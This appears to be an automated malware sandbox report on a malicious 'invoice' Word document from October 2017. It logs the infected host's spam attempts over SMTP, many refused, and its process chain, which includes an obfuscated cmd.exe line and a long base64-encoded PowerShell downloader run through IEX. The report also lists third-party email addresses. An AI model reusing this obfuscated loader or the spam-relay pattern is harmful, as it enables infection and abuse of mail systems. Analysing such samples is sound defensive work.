Okt 17, 2017 21:54:38.164479017 MESZ58749233213.186.33.155192.168.1.16220-ssl0.ovh.net player755
Okt 17, 2017 21:54:38.642580986 MESZ58749235195.250.38.66192.168.1.16220 ESMTP
Okt 17, 2017 21:54:38.642976999 MESZ49235587192.168.1.16195.250.38.66HELO 10.0.0.6
Okt 17, 2017 21:54:38.890049934 MESZ58749235195.250.38.66192.168.1.16250 star.gd-net.pl
Okt 17, 2017 21:54:38.891299963 MESZ49235587192.168.1.16195.250.38.66MAIL FROM: <interlink@interlink.biz.pl
Okt 17, 2017 21:54:38.917887926 MESZ5874923285.13.134.71192.168.1.16220 dd11938.kasserver.com ESMTP
Okt 17, 2017 21:54:38.919579029 MESZ49232587192.168.1.1685.13.134.71HELO 10.0.0.2
Okt 17, 2017 21:54:38.965193033 MESZ58749238213.90.36.9192.168.1.16220 patricia.xoc.tele2net.at ESMTP Exim 4.80 Tue, 17 Oct 2017 21:54:38 +0200
Okt 17, 2017 21:54:38.967669964 MESZ49238587192.168.1.16213.90.36.9EHLO 10.0.0.
Okt 17, 2017 21:54:39.048718929 MESZ5874923285.13.134.71192.168.1.16250 dd11938.kasserver.com
Okt 17, 2017 21:54:39.050331116 MESZ49232587192.168.1.1685.13.134.71MAIL FROM: <marlis.winkler@als-leipzig.de
Okt 17, 2017 21:54:39.133261919 MESZ58749238213.90.36.9192.168.1.16250-patricia.xoc.tele2net.at Hello 10.0.0.6 [95.141.35.15]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN CRAM-MD5
250-AUTH=LOGIN
250-STARTTLS
250 HELP
Okt 17, 2017 21:54:39.174391031 MESZ58749235195.250.38.66192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:39.175335884 MESZ49235587192.168.1.16195.250.38.66RCPT TO: <brian_lynch@bd.com
Okt 17, 2017 21:54:39.318023920 MESZ5874923285.13.134.71192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:39.318957090 MESZ49232587192.168.1.1685.13.134.71RCPT TO: <brian_lusco@yahoo.com
Okt 17, 2017 21:54:39.355400085 MESZ58749238213.90.36.9192.168.1.16220 TLS go ahead
Okt 17, 2017 21:54:39.519396067 MESZ58749235195.250.38.66192.168.1.16554 5.7.1 <brian_lynch@bd.com>: Relay access denied
Okt 17, 2017 21:54:39.519427061 MESZ5874923285.13.134.71192.168.1.16454 4.7.1 <brian_lusco@yahoo.com>: Relay access denied
Okt 17, 2017 21:54:39.831814051 MESZ5874924137.9.169.18192.168.1.16220 lb-proxy-16.websupport.sk ESMTP
Okt 17, 2017 21:54:39.832637072 MESZ49241587192.168.1.1637.9.169.18HELO 10.0.0.3
Okt 17, 2017 21:54:39.921540022 MESZ58749214213.186.33.20192.168.1.16220 ssl0.ovh.net player714
Okt 17, 2017 21:54:39.922384977 MESZ49214587192.168.1.16213.186.33.20HELO 10.0.0.6
Okt 17, 2017 21:54:40.062701941 MESZ5874924137.9.169.18192.168.1.16250 lb-proxy-16.websupport.sk
Okt 17, 2017 21:54:40.065670967 MESZ49241587192.168.1.1637.9.169.18MAIL FROM: <mareckova@slovclean.sk
Okt 17, 2017 21:54:40.087569952 MESZ58749214213.186.33.20192.168.1.16250 player714.ha.ovh.net
Okt 17, 2017 21:54:40.089057922 MESZ49214587192.168.1.16213.186.33.20MAIL FROM: <reservations@hotel-angleterre-grenoble.com
Okt 17, 2017 21:54:40.278568983 MESZ5874924137.9.169.18192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:40.279470921 MESZ49241587192.168.1.1637.9.169.18RCPT TO: <brian_lucas@rush.edu
Okt 17, 2017 21:54:40.286837101 MESZ58749214213.186.33.20192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:40.287818909 MESZ49214587192.168.1.16213.186.33.20RCPT TO: <brian_lubbert@yahoo.com
Okt 17, 2017 21:54:40.506454945 MESZ58749214213.186.33.20192.168.1.16554 5.7.1 <unknown[95.141.35.15]>: Client host rejected: Access denied
Okt 17, 2017 21:54:40.546652079 MESZ5874924137.9.169.18192.168.1.16554 5.7.1 <unknown[95.141.35.15]>: Client host rejected: Access denied
Okt 17, 2017 21:54:41.269423008 MESZ58749248213.145.228.17192.168.1.16220 host4.ssl-gesichert.at ESMTP
Okt 17, 2017 21:54:41.270320892 MESZ49248587192.168.1.16213.145.228.17HELO 10.0.0.6
Okt 17, 2017 21:54:41.551223993 MESZ58749248213.145.228.17192.168.1.16250 host4.ssl-gesichert.at
Okt 17, 2017 21:54:41.552750111 MESZ49248587192.168.1.16213.145.228.17MAIL FROM: <office%reicher-gefluegel.at@ssl-gesichert.at
Okt 17, 2017 21:54:41.560185909 MESZ5874925274.125.205.108192.168.1.16220 smtp.gmail.com ESMTP j63sm2188821lfi.80 - gsmtp
Okt 17, 2017 21:54:41.562786102 MESZ49252587192.168.1.1674.125.205.108EHLO 10.0.0.4
Okt 17, 2017 21:54:41.872137070 MESZ5874925274.125.205.108192.168.1.16250-smtp.gmail.com at your service, [95.141.35.15]
250-SIZE 35882577
250-8BITMIME
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-CHUNKING
250 SMTPUTF8
Okt 17, 2017 21:54:42.172352076 MESZ5874925274.125.205.108192.168.1.16220 2.0.0 Ready to start TLS
Okt 17, 2017 21:54:42.901932001 MESZ58749248213.145.228.17192.168.1.16553 5.1.7 sorry, mailbox syntax not allowed (chkuser)
Okt 17, 2017 21:54:42.935663939 MESZ58749255212.77.101.1192.168.1.16550 [IP:197.231.221.211] polaczenia z Twojego adresu IP sa zablokowane administracyjnie / mail from your IP address is administratively disabled
Okt 17, 2017 21:54:43.085822105 MESZ58749256212.77.101.1192.168.1.16550 [IP:197.231.221.211] polaczenia z Twojego adresu IP sa zablokowane administracyjnie / mail from your IP address is administratively disabled
Okt 17, 2017 21:54:43.275994062 MESZ58749257212.77.101.1192.168.1.16550 [IP:197.231.221.211] polaczenia z Twojego adresu IP sa zablokowane administracyjnie / mail from your IP address is administratively disabled
Okt 17, 2017 21:54:43.326961994 MESZ58749258212.77.101.1192.168.1.16550 [IP:197.231.221.211] polaczenia z Twojego adresu IP sa zablokowane administracyjnie / mail from your IP address is administratively disabled
Okt 17, 2017 21:54:43.517910957 MESZ58749259212.77.101.1192.168.1.16550 [IP:197.231.221.211] polaczenia z Twojego adresu IP sa zablokowane administracyjnie / mail from your IP address is administratively disabled
Okt 17, 2017 21:54:43.643699884 MESZ5874926181.19.149.200192.168.1.16220 mx17lb.world4you.com ESMTP Exim 4.84_2 Tue, 17 Oct 2017 21:54:43 +0200
Okt 17, 2017 21:54:43.645440102 MESZ49261587192.168.1.1681.19.149.200EHLO 10.0.0.
Okt 17, 2017 21:54:43.717499018 MESZ58749233213.186.33.155192.168.1.16220 ssl0.ovh.net player755
Okt 17, 2017 21:54:43.718256950 MESZ49233587192.168.1.16213.186.33.155HELO 10.0.0.2
Okt 17, 2017 21:54:43.787441969 MESZ58749262212.33.55.20192.168.1.16220 24speed begruesst Sie auf seinem Mail-Server
Okt 17, 2017 21:54:43.787470102 MESZ5874926181.19.149.200192.168.1.16250-mx17lb.world4you.com Hello 10.0.0.6 [197.231.221.211]
250-SIZE 157286400
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Okt 17, 2017 21:54:43.789154053 MESZ49262587192.168.1.16212.33.55.20HELO 10.0.0.3
Okt 17, 2017 21:54:43.893574953 MESZ58749233213.186.33.155192.168.1.16250 player755.ha.ovh.net
Okt 17, 2017 21:54:43.894746065 MESZ49233587192.168.1.16213.186.33.155MAIL FROM: <biuro@domartstyl.eu
Okt 17, 2017 21:54:43.902142048 MESZ58749262212.33.55.20192.168.1.16250 so.liwest.at Hello 10.0.0.34 [197.231.221.211]
Okt 17, 2017 21:54:43.904123068 MESZ49262587192.168.1.16212.33.55.20MAIL FROM: <MF241971@liwest.at
Okt 17, 2017 21:54:44.018666029 MESZ5874926181.19.149.200192.168.1.16220 TLS go ahead
Okt 17, 2017 21:54:44.111896038 MESZ58749233213.186.33.155192.168.1.16250 2.1.0 Ok
Okt 17, 2017 21:54:44.112818003 MESZ49233587192.168.1.16213.186.33.155RCPT TO: <brian_lite2@yahoo.com
Okt 17, 2017 21:54:44.130865097 MESZ58749262212.33.55.20192.168.1.16250 OK
Okt 17, 2017 21:54:44.131458044 MESZ49262587192.168.1.16212.33.55.20RCPT TO: <brian_lirette@nextransport.com
Okt 17, 2017 21:54:44.294446945 MESZ58749233213.186.33.155192.168.1.16554 5.7.1 <unknown[95.141.35.15]>: Client host rejected: Access denied
Okt 17, 2017 21:54:44.337522984 MESZ58749262212.33.55.20192.168.1.16550 relay not permitted
Okt 17, 2017 21:55:52.204737902 MESZ5874926840.101.48.82192.168.1.16220 HE1PR0202CA0004.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:55:51 +0000
Okt 17, 2017 21:55:52.205239058 MESZ49268587192.168.1.1640.101.48.82EHLO 10.0.0.2
Okt 17, 2017 21:55:52.279372931 MESZ5874927040.101.48.82192.168.1.16220 HE1PR0202CA0015.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:55:51 +0000
Okt 17, 2017 21:55:52.279401064 MESZ5874926940.101.48.82192.168.1.16220 HE1PR0202CA0023.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:55:51 +0000
Okt 17, 2017 21:55:52.279411077 MESZ5874927140.101.48.82192.168.1.16220 HE1PR0202CA0024.outlook.office365.com Microsoft ESMTP MAIL Service ready at Tue, 17 Oct 2017 19:55:52 +0000
Okt 17, 2017 21:55:52.279660940 MESZ49270587192.168.1.1640.101.48.82EHLO 10.0.0.3
Okt 17, 2017 21:55:52.279836893 MESZ49269587192.168.1.1640.101.48.82EHLO 10.0.0.3
Okt 17, 2017 21:55:52.280185938 MESZ49271587192.168.1.1640.101.48.82EHLO 10.0.0.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:21:54:09
Start date:17/10/2017
Path:C:\Windows\System32\wget.exe
Wow64 process (32bit):false
Commandline:wget -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/'
Imagebase:0x75440000
File size:826368 bytes
MD5 hash:834C709455BFEFB9B0E8976BAD13A8F4
Programmed in:C, C++ or other language

General

Start time:21:54:13
Start date:17/10/2017
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc
Imagebase:0x772c0000
File size:1423008 bytes
MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
Programmed in:C, C++ or other language

General

Start time:21:54:15
Start date:17/10/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkALAAgADQANgAsADcAOAAsADEAMAAxACwAIAAxADEANgAgACwAIAA0ADYAIAAsADgANwAsADEAMAAxACAALAAgADkAOAAsACAANgA3ACAALAAxADAAOAAsADEAMAA1ACAALAAxADAAMQAsACAAMQAxADAAIAAsADEAMQA2ACwAIAA1ADkAIAAsACAAMwA2ACAALAAgADEAMQA0ACAALAA5ADcALAAgADEAMQAwACwAMQAwADAALAAxADEAMQAsADEAMAA5ACAALAAgADMAMgAgACwAIAA2ADEALAAzADIAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMQA5ACwAIAA0ADUALAAgADEAMQAxACwAIAA5ADgALAAgADEAMAA2ACwAIAAxADAAMQAgACwAOQA5ACAALAAgADEAMQA2ACAALAAgADMAMgAsADEAMQA0ACwAIAA5ADcALAAgADEAMQAwACwAMQAwADAAIAAsACAAMQAxADEALAAxADAAOQAgACwAIAA1ADkAIAAsACAAMwA2ACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAMQAxADUALAAzADIAIAAsADYAMQAgACwAIAAzADIALAAgADMAOQAgACwAMQAwADQALAAxADEANgAgACwAIAAxADEANgAsADEAMQAyACAALAA1ADgAIAAsACAANAA3ACwAIAA0ADcAIAAsADEAMgAyACwAIAAxADAAOAAgACwAIAA5ADkALAAgADQANQAsADkANwAgACwAOQA3ACwAIAA0ADYALAAgADEAMQAxACAALAAxADEANAAgACwAIAAxADAAMwAgACwAIAA0ADcALAAgADEAMQAwACwAMQAxADkAIAAsACAAOQA4ACAALAA2ADYALAA3ADQALAAgADgAMgAsADEAMQAwACAALAAxADAAMgAgACwAIAA0ADcAIAAsADQANAAgACwAMQAwADQALAAgADEAMQA2ACwAMQAxADYAIAAsACAAMQAxADIAIAAsADUAOAAgACwANAA3ACAALAAgADQANwAgACwAIAA1ADEAIAAsACAAOQA5ACAALAAgADEAMAAzACwAIAAxADAAMgAgACwAMQAyADAALAAgADQANgAgACwAIAA5ADkAIAAsADEAMQAxACAALAAxADAAOQAgACwAIAA0ADcAIAAsADEAMgAwACAALAA5ADcALAA4ADEAIAAsADQANwAsADQANAAgACwAMQAwADQAIAAsACAAMQAxADYAIAAsACAAMQAxADYAIAAsADEAMQAyACwAIAA1ADgAIAAsACAANAA3ACAALAAgADQANwAgACwAMQAxADQAIAAsADEAMAAxACwAIAAxADAANwAgACwAMQAwADEAIAAsACAAMQAxADAALAAgADQANQAgACwAIAA5ADgALAAgADEAMAA0ACwAMQAwADIALAA0ADYAIAAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACwAIAA3ADYALAAxADAAMQAsADEAMQAwACAALAAgADEAMQA2ACAALAAxADAAMQAgACwAIAAxADEANAAgACwAIAA0ADkALAA0ADcAIAAsADEAMQA1ACAALAAgADEAMAA0ACwANwAwACAALAAxADEAOAAgACwAIAAxADIAMAAsADYANQAsADgANgAgACwAIAA2ADcAIAAsACAAMQAyADAAIAAsACAANAA3ACAALAA0ADQALAAxADAANAAsADEAMQA2ACAALAAgADEAMQA2ACAALAAgADEAMQAyACwAIAA1ADgALAAgADQANwAsACAANAA3ACAALAA5ADcAIAAsACAAMQAxADAALAAxADEANgAgACwAIAA5ADgALAAgADEAMAAxACwAOQA3ACAALAAxADEANAAgACwANAA2ACwAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACAALAAgADEAMQAwACwAOQA4ACAALAAgADEAMQA0ACwAOQAwACwAMQAxADAALAAgADEAMQAzACAALAA0ADcALAA0ADQALAAxADAANAAgACwAMQAxADYALAAgADEAMQA2ACwAMQAxADIAIAAsADUAOAAsADQANwAgACwANAA3ACwAIAAxADEAMgAgACwAIAAxADEANAAsACAAOQA3ACAALAAgADEAMgAwACwAIAAxADAANQAsADEAMQA1ACwAIAAxADAAOAAgACwAMQAxADcAIAAsADEAMAA5ACAALAAgADEAMQAyACwAMQAxADIAIAAsADQANgAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsADQANwAgACwANgA5ACwANwAyACwAIAAxADEAOQAgACwANAA3ACwAIAAzADkALAAgADQANgAgACwAOAAzACAALAAgADEAMQAyACwAIAAxADAAOAAgACwAIAAxADAANQAsACAAMQAxADYAIAAsACAANAAwACAALAAzADkALAA0ADQALAAgADMAOQAsADQAMQAsADUAOQAsACAAMwA2ACAALAAxADEAMAAgACwAOQA3ACAALAAxADAAOQAsACAAMQAwADEALAAzADIAIAAsADYAMQAgACwAMwAyACAALAAzADYAIAAsACAAMQAxADQAIAAsACAAOQA3ACwAMQAxADAAIAAsADEAMAAwACwAIAAxADEAMQAgACwAMQAwADkALAA0ADYAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMgAwACAALAAxADEANgAgACwAIAA0ADAAIAAsADQAOQAsADQANAAsADMAMgAsACAANQA0ACwAIAA1ADMALAA1ADMAIAAsACAANQAxACAALAA1ADQALAAgADQAMQAgACwAIAA1ADkAIAAsACAAMwA2ACAALAAxADEAMgAgACwAOQA3ACwAMQAxADYALAAgADEAMAA0ACwAIAAzADIALAAgADYAMQAgACwAMwAyACAALAAgADMANgAgACwAMQAwADEALAAxADEAMAAsACAAMQAxADgAIAAsADUAOAAsACAAMQAxADYAIAAsADEAMAAxACwAIAAxADAAOQAsACAAMQAxADIALAAgADMAMgAgACwANAAzACwAMwAyACAALAAgADMAOQAsACAAOQAyACwAIAAzADkAIAAsADMAMgAsADQAMwAgACwAIAAzADIALAAzADYAIAAsACAAMQAxADAALAAgADkANwAsADEAMAA5ACAALAAxADAAMQAsADMAMgAgACwAIAA0ADMALAAzADIAIAAsACAAMwA5ACAALAAgADQANgAgACwAMQAwADEAIAAsADEAMgAwACAALAAxADAAMQAsADMAOQAsACAANQA5ACwAMQAwADIAIAAsACAAMQAxADEAIAAsACAAMQAxADQALAAxADAAMQAgACwAOQA3ACwAOQA5ACAALAAxADAANAAgACwAIAA0ADAAIAAsADMANgAgACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAIAAzADIAIAAsADEAMAA1ACAALAAxADEAMAAgACwAIAAzADIALAAzADYALAAgADEAMQA3ACAALAAxADEANAAgACwAIAAxADAAOAAgACwAIAAxADEANQAsADQAMQAgACwAMQAyADMAIAAsADEAMQA2ACAALAAgADEAMQA0ACAALAAgADEAMgAxACAALAAgADEAMgAzACwAMwA2ACwAIAAxADEAOQAgACwAIAAxADAAMQAgACwAIAA5ADgAIAAsADkAOQAsADEAMAA4ACAALAAxADAANQAgACwAMQAwADEAIAAsACAAMQAxADAAIAAsADEAMQA2ACwANAA2ACwANgA4ACwAMQAxADEALAAxADEAOQAgACwAIAAxADEAMAAgACwAMQAwADgAIAAsADEAMQAxACAALAA5ADcAIAAsACAAMQAwADAALAA3ADAALAAgADEAMAA1ACAALAAxADAAOAAgACwAIAAxADAAMQAgACwAIAA0ADAALAAzADYALAAgADEAMQA3ACwAMQAxADQAIAAsACAAMQAwADgAIAAsACAANAA2ACwAIAA4ADQALAAgADEAMQAxACAALAA4ADMAIAAsACAAMQAxADYAIAAsACAAMQAxADQALAAxADAANQAsADEAMQAwACwAIAAxADAAMwAsADQAMAAgACwAIAA0ADEALAA0ADQAIAAsADMAMgAgACwAIAAzADYALAAxADEAMgAsACAAOQA3ACwAMQAxADYAIAAsADEAMAA0ACAALAA0ADEAIAAsACAANQA5ACAALAAgADgAMwAsADEAMQA2ACwAIAA5ADcALAAgADEAMQA0ACAALAAxADEANgAsACAANAA1ACwAIAA4ADAAIAAsACAAMQAxADQALAAgADEAMQAxACwAIAA5ADkAIAAsADEAMAAxACwAIAAxADEANQAgACwAIAAxADEANQAsACAAMwAyACAALAAgADMANgAgACwAMQAxADIAIAAsADkANwAgACwAIAAxADEANgAsACAAMQAwADQALAA1ADkALAA5ADgAIAAsADEAMQA0ACAALAAgADEAMAAxACAALAA5ADcALAAxADAANwAgACwAIAA1ADkAIAAsACAAMQAyADUAIAAsADkAOQAgACwAOQA3ACwAIAAxADEANgAsACAAOQA5ACwAMQAwADQALAAgADEAMgAzACAALAAgADEAMQA5ACwAIAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADYAIAAsADEAMAAxACwAIAA0ADUAIAAsADEAMAA0ACwAMQAxADEAIAAsACAAMQAxADUAIAAsACAAMQAxADYALAAzADIALAAgADMANgAgACwAOQA1ACwAIAA0ADYAIAAsACAANgA5ACAALAAxADIAMAAgACwAIAA5ADkALAAxADAAMQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsACAAMQAwADUALAAxADEAMQAgACwAMQAxADAAIAAsACAANAA2ACwAIAA3ADcAIAAsADEAMAAxACAALAAxADEANQAgACwAIAAxADEANQAgACwAOQA3ACwAMQAwADMALAAxADAAMQAgACwANQA5ACAALAAxADIANQAsACAAMQAyADUAIAApACAAfAAgACUAIAB7ACAAKAAgAFsAQwBIAEEAUgBdAFsASQBOAHQAXQAgACQAXwApAH0AIAApACAALQBKAE8ASQBuACcAJwApAA==
Imagebase:0x75440000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

General

Start time:21:54:16
Start date:17/10/2017
Path:C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Wow64 process (32bit):false
Commandline:C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Imagebase:0x751e0000
File size:4640000 bytes
MD5 hash:358A9CCA612C68EB2F07DDAD4CE1D8D7
Programmed in:C, C++ or other language

General

Start time:21:54:16
Start date:17/10/2017
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA1ACAALAAgADEAMQA2ACwAIAAxADAAMQAsACAAMQAwADkALAAgADQANgAsADcAOAAsADEAMAAxACwAIAAxADEANgAgACwAIAA0ADYAIAAsADgANwAsADEAMAAxACAALAAgADkAOAAsACAANgA3ACAALAAxADAAOAAsADEAMAA1ACAALAAxADAAMQAsACAAMQAxADAAIAAsADEAMQA2ACwAIAA1ADkAIAAsACAAMwA2ACAALAAgADEAMQA0ACAALAA5ADcALAAgADEAMQAwACwAMQAwADAALAAxADEAMQAsADEAMAA5ACAALAAgADMAMgAgACwAIAA2ADEALAAzADIAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMQA5ACwAIAA0ADUALAAgADEAMQAxACwAIAA5ADgALAAgADEAMAA2ACwAIAAxADAAMQAgACwAOQA5ACAALAAgADEAMQA2ACAALAAgADMAMgAsADEAMQA0ACwAIAA5ADcALAAgADEAMQAwACwAMQAwADAAIAAsACAAMQAxADEALAAxADAAOQAgACwAIAA1ADkAIAAsACAAMwA2ACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAMQAxADUALAAzADIAIAAsADYAMQAgACwAIAAzADIALAAgADMAOQAgACwAMQAwADQALAAxADEANgAgACwAIAAxADEANgAsADEAMQAyACAALAA1ADgAIAAsACAANAA3ACwAIAA0ADcAIAAsADEAMgAyACwAIAAxADAAOAAgACwAIAA5ADkALAAgADQANQAsADkANwAgACwAOQA3ACwAIAA0ADYALAAgADEAMQAxACAALAAxADEANAAgACwAIAAxADAAMwAgACwAIAA0ADcALAAgADEAMQAwACwAMQAxADkAIAAsACAAOQA4ACAALAA2ADYALAA3ADQALAAgADgAMgAsADEAMQAwACAALAAxADAAMgAgACwAIAA0ADcAIAAsADQANAAgACwAMQAwADQALAAgADEAMQA2ACwAMQAxADYAIAAsACAAMQAxADIAIAAsADUAOAAgACwANAA3ACAALAAgADQANwAgACwAIAA1ADEAIAAsACAAOQA5ACAALAAgADEAMAAzACwAIAAxADAAMgAgACwAMQAyADAALAAgADQANgAgACwAIAA5ADkAIAAsADEAMQAxACAALAAxADAAOQAgACwAIAA0ADcAIAAsADEAMgAwACAALAA5ADcALAA4ADEAIAAsADQANwAsADQANAAgACwAMQAwADQAIAAsACAAMQAxADYAIAAsACAAMQAxADYAIAAsADEAMQAyACwAIAA1ADgAIAAsACAANAA3ACAALAAgADQANwAgACwAMQAxADQAIAAsADEAMAAxACwAIAAxADAANwAgACwAMQAwADEAIAAsACAAMQAxADAALAAgADQANQAgACwAIAA5ADgALAAgADEAMAA0ACwAMQAwADIALAA0ADYAIAAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACwAIAA3ADYALAAxADAAMQAsADEAMQAwACAALAAgADEAMQA2ACAALAAxADAAMQAgACwAIAAxADEANAAgACwAIAA0ADkALAA0ADcAIAAsADEAMQA1ACAALAAgADEAMAA0ACwANwAwACAALAAxADEAOAAgACwAIAAxADIAMAAsADYANQAsADgANgAgACwAIAA2ADcAIAAsACAAMQAyADAAIAAsACAANAA3ACAALAA0ADQALAAxADAANAAsADEAMQA2ACAALAAgADEAMQA2ACAALAAgADEAMQAyACwAIAA1ADgALAAgADQANwAsACAANAA3ACAALAA5ADcAIAAsACAAMQAxADAALAAxADEANgAgACwAIAA5ADgALAAgADEAMAAxACwAOQA3ACAALAAxADEANAAgACwANAA2ACwAMQAwADAAIAAsACAAMQAwADEAIAAsACAANAA3ACAALAAgADEAMQAwACwAOQA4ACAALAAgADEAMQA0ACwAOQAwACwAMQAxADAALAAgADEAMQAzACAALAA0ADcALAA0ADQALAAxADAANAAgACwAMQAxADYALAAgADEAMQA2ACwAMQAxADIAIAAsADUAOAAsADQANwAgACwANAA3ACwAIAAxADEAMgAgACwAIAAxADEANAAsACAAOQA3ACAALAAgADEAMgAwACwAIAAxADAANQAsADEAMQA1ACwAIAAxADAAOAAgACwAMQAxADcAIAAsADEAMAA5ACAALAAgADEAMQAyACwAMQAxADIAIAAsADQANgAsACAAMQAwADAAIAAsACAAMQAwADEAIAAsADQANwAgACwANgA5ACwANwAyACwAIAAxADEAOQAgACwANAA3ACwAIAAzADkALAAgADQANgAgACwAOAAzACAALAAgADEAMQAyACwAIAAxADAAOAAgACwAIAAxADAANQAsACAAMQAxADYAIAAsACAANAAwACAALAAzADkALAA0ADQALAAgADMAOQAsADQAMQAsADUAOQAsACAAMwA2ACAALAAxADEAMAAgACwAOQA3ACAALAAxADAAOQAsACAAMQAwADEALAAzADIAIAAsADYAMQAgACwAMwAyACAALAAzADYAIAAsACAAMQAxADQAIAAsACAAOQA3ACwAMQAxADAAIAAsADEAMAAwACwAIAAxADEAMQAgACwAMQAwADkALAA0ADYAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMgAwACAALAAxADEANgAgACwAIAA0ADAAIAAsADQAOQAsADQANAAsADMAMgAsACAANQA0ACwAIAA1ADMALAA1ADMAIAAsACAANQAxACAALAA1ADQALAAgADQAMQAgACwAIAA1ADkAIAAsACAAMwA2ACAALAAxADEAMgAgACwAOQA3ACwAMQAxADYALAAgADEAMAA0ACwAIAAzADIALAAgADYAMQAgACwAMwAyACAALAAgADMANgAgACwAMQAwADEALAAxADEAMAAsACAAMQAxADgAIAAsADUAOAAsACAAMQAxADYAIAAsADEAMAAxACwAIAAxADAAOQAsACAAMQAxADIALAAgADMAMgAgACwANAAzACwAMwAyACAALAAgADMAOQAsACAAOQAyACwAIAAzADkAIAAsADMAMgAsADQAMwAg